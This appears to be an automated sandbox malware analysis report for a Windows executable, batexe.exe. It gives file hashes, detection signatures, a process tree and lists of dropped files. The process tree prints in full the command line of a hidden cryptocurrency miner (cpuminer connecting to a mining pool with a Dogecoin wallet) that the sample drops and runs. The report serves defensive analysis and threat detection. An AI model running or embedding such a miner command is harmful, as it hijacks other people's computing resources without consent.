73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
294s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21-02-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4652	b2e.exe
812	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
812	cpuminer-sse2.exe
812	cpuminer-sse2.exe
812	cpuminer-sse2.exe
812	cpuminer-sse2.exe
812	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1764-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1764 wrote to memory of 4652	1764	batexe.exe	73
PID 1764 wrote to memory of 4652	1764	batexe.exe	73
PID 1764 wrote to memory of 4652	1764	batexe.exe	73
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 968 wrote to memory of 812	968	cmd.exe	77
PID 968 wrote to memory of 812	968	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1764
- C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2E10.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe

Filesize
832KB

MD5
e1bd95ac3f9c6ce43914de2a53967fee

SHA1
3e03982c075df051d5a8dd837f42873f30483faf

SHA256
45c3475b58fbaa942be0297167c5c3fbbfe7295aa3fcbb4fb61df1348f55c550

SHA512
2166424e86301bbe04fbcce5d0b91562248845c5b1a7e889fee9a95d1c872dd6ea5cc85792b54e6d085095339be2f2b7f30cfd9b40a071b51c96a5009cc96f00

Download Submit
C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe

Filesize
999KB

MD5
2b3b4ff0ca20f74fcc2392825320b902

SHA1
7fafc6d88b1db59fda0b254fdb905bd6eb02e67e

SHA256
4d0e72563bd460b7a4292f0ba3e91c038a9fa48c2f69e81b5e51d889392febcc

SHA512
f0c801fcac6885831bdc558140a383b143826a4a07d17bc9d825663335cd930c48cbcf3f866cad55a41f568a884556c065f912ca48aa444c9e03a90280591c6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2E10.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
661KB

MD5
fa186578d25dc500b8f62f1b2c0e39c5

SHA1
a973b049580e61032c275c079cf2c258296f2615

SHA256
99ad1ac647007c618b9cd8257a5b87561aa9240570a7976f36f699b7800b4852

SHA512
0a97aee3b5a1bedb84d2db400529909eddabfc38ddbdb7c6d495578ef1aa4b59fe2cb4d04685c683e456a457e0c5634dcf970afaf3c8d5c806febce3238ea464

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
362KB

MD5
e7b7ac73de8b7cd43c1123eb9b7a6358

SHA1
e6dbfcb4b8b88ac029a7e0535c51aa8cba64e2ee

SHA256
e945ed7289f9d17f7846e945e9f9af399a7cb912547bc331d085b5176ba79823

SHA512
8341e735577429387963e3341677db03fa58503107fe3ea0221ed4d88a7c5608cf0143b002e69488072dc6f22dc9c6d0829579eebd18cd29aa665a29d8b51b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
496KB

MD5
43b6e613641eb8590bd609ca1114a9ce

SHA1
2f0a8256e0adc8977e9f80f67af767bd3beede43

SHA256
6342073bb919b07f783941486f120e231591b10b2295210588279a793db19cf6

SHA512
f48652104894a1a5f8900ef17420c033d7f2651995bfa67ebc24bf2335d607664cf09442a70bd0a8c2974660693a1230fa96dfec4a6cb9764406311ed21dca69

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
599KB

MD5
5b8821e182c165eb65167a18b408de50

SHA1
dd40c47f3e0bd4fb960d96207d80deabebb4a23b

SHA256
4418a6c1db6ffe55f5117223b6c211b8b54463c16921bb9a599146ef6de60447

SHA512
bc3611b5ff71d20b7d34c3d2000bd1063b203bf08942dc5d3df439532ec1eeb698e3006c67351a7a8545d01cfda9c6ca43519aaf10e216fa4c22bb28ff514cba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
561KB

MD5
73bbc4a2bc312c2abb551fb33b4b1437

SHA1
5cb181fd60f95f8af65698fc6b5fc147d45589fb

SHA256
01114ddd9c64b854fdcb5dbab63900e1e5721cd9a2a644cb378410db404ef76e

SHA512
bc3654695ec860a56d06b2161c9f9ef55fef533a366de8d9040150a5a137dd22b955bbba02373de1886119f374b0e77392a4163d8c70e9a7b92d87bd3195faa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
369KB

MD5
480bee19e7b13cad54c12b5e404e66f9

SHA1
2d38fb6ff79ce8acd7818f6612c826c627e85c6a

SHA256
dfec3e2391cec95d649ceda3e32da444e72a25a54832579695e0f16ce10d8890

SHA512
55c0e42ca11535bd9546c44bd7c0b66b1a8194878a758cda62c89ecd4fab4f3c922122daeebe5936eaf98b80605cc38e1e55ea3229e8caee5b35bc9fd777e19b

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
369KB

MD5
91c209343336b9f5125087ba2e636e7e

SHA1
f3e061fa495b9e1720d0f3afbba5389551d5ea71

SHA256
0817e02e7057bedfe48f814e9270c62eebe74223ddef76b20fb3cdea124c9dda

SHA512
36ed4c0dfc44b7549b11cfb13eaf9790a5e6fb380946685232d56050aa35f82946d22f6dd7f07c689199052b7a2b6759126c7e5d798847f9925df4e32a1919eb

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
501KB

MD5
f03008f91709c2feee35274c69464c4f

SHA1
3aac569fee73449aba265a1e3ca140afb8c012c4

SHA256
441142633df8a76cd8e85f58786370160955a2f5e1e60012b414e9702f4b4d57

SHA512
89d9190086300527e6742e166d53baf7c2d5b24e83b0e4a5f2be214872cae9ac080ff277b4e46e49a63f1e867856b937bd7066b92a6d99997f8b3904757762e2

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
554KB

MD5
5dbca8e2c0a6ad98cef6f603cee58b2a

SHA1
781021725cbc09c49c44dfa1aa8168207d856cac

SHA256
8aada064610346ada65347e1020cac174492ba5c7d8822b27c88355fff7f2793

SHA512
351f678409e21819ff9bd2c3eed209fc9b4d1e3e4d13f0256cb1f7f62c2a8aa07d123f3c3c46147788ba74f24e766a5c01f1a7170ff816cbe11f06526743db64

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
492KB

MD5
6ff427c07dbf03b71415b8066181106b

SHA1
be45fcfeae14f75b10b1d7bdb7c0fc9d7cb69239

SHA256
fc0bf772133884a40c10774697bc5138c97e86faf82412f62a7646b38edf7a53

SHA512
dc4bf79b16f09a8d4b31770beb23c7f61cae155aeda577bad804396e7de6c7280e00c6e2408bb634163dbf04dfbaf0b86974000ae1001384f5f8f42a5c3a11cf

Download Submit
memory/812-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/812-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-42-0x000000005D8A0000-0x000000005D938000-memory.dmp

Filesize
608KB

Download
memory/812-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/812-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/812-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/812-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1764-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4652-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4652-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download